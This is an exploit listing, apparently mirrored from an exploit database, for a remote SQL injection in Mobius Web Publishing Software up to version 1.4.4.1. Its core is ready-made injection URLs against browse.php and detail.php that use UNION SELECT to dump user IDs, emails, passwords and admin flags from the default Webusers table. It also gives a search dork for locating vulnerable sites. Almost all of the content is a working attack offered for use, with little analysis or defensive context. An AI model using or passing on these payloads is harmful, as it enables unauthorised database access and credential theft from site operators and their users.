Lucene search

K

Mobius <= 1.4.4.1 (browse.php id) Remote SQL Injection Vulnerability

๐Ÿ—“๏ธย 26 Jul 2008ย 00:00:00Reported byย dunTypeย 
zdt
ย zdt
๐Ÿ”—ย 0day.today๐Ÿ‘ย 22ย Views

Mobius <= 1.4.4.1 Remote SQL Injection Vulnerability in browse.php i

Show more
Code
====================================================================
Mobius <= 1.4.4.1 (browse.php id) Remote SQL Injection Vulnerability
====================================================================



 #################################################################
 #   [ Mobius <= 1.4.4.1 ]   Remote SQL Injection Vulnerability  #
 #################################################################
 # 
 # [ Script: Mobius Web Publishing Software ]
 #
 # [ Script site: http://www.willo.com/mimsy_xg/mobius.asp ]
 # 
 # [ Default table_name with users: Webusers ]
 # 
 # [ Vuln: browse.php ] http://site.com/browse.php?id=-1+UNION+SELECT+concat_ws(char(58),USID,EMAIL,SUPERSECRETPASSWORD,ADMIN)+from+Webusers+limit+0,1/* 	
 #	
 # [ Vuln: detail.php ] http://site.com/mobius_path/detail.php?t=exhibitions&type=exh&f=&s=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/* 
 # *[ in other version of Mobius, number of columns may be different ]* 
 # 
 # [ Dork example: "This website is powered by Mobius" ]
 #
 #####################################################



#  0day.today [2018-04-14]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
26 Jul 2008 00:00Current
7.1High risk
Vulners AI Score7.1
22
.json
Report